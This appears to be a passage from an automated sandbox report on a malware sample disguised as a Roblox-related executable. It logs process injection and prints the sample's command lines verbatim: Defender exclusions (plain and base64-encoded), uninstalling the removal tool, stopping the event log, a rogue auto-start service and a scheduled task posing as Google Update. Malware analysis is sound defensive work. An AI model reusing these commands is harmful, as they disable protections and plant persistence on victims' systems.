Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3176 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 3176 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 3176 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 4364 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4364 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4364 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4364 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe
PID 4364 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe
PID 3176 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe
PID 3176 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe
PID 3372 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 3372 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 3372 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 3372 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 3372 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 3372 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 3372 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 2632 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2632 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2036 wrote to memory of 616 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 2036 wrote to memory of 664 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 2036 wrote to memory of 952 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1020 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 664 wrote to memory of 2752 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 664 wrote to memory of 2752 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2036 wrote to memory of 748 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 664 wrote to memory of 2752 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2036 wrote to memory of 892 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1080 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1088 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1100 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1156 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1220 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1276 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1328 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1412 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1444 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1456 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1564 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1584 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1628 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1660 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1736 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1768 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1852 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1860 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1868 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1932 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 2040 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 2036 wrote to memory of 2104 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 2228 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 2308 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2404 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2412 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2540 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\sihost.exe
PID 2036 wrote to memory of 2572 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2644 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2692 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\taskhostw.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe

"C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAeQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAYQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAawBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdQBwACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe

"C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAawBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAaABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

"C:\Users\Admin\AppData\Local\Temp\Roblox.exe"

C:\Users\Admin\AppData\Local\Temp\ccccc.exe

"C:\Users\Admin\AppData\Local\Temp\ccccc.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "HGJYCZBA"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "HGJYCZBA" binpath= "C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HGJYCZBA"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe

C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 7c17dd8c3f97142a86b911d5eb94f1a5 Eyvf8LEpNkav2LmwIsPTYQ.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

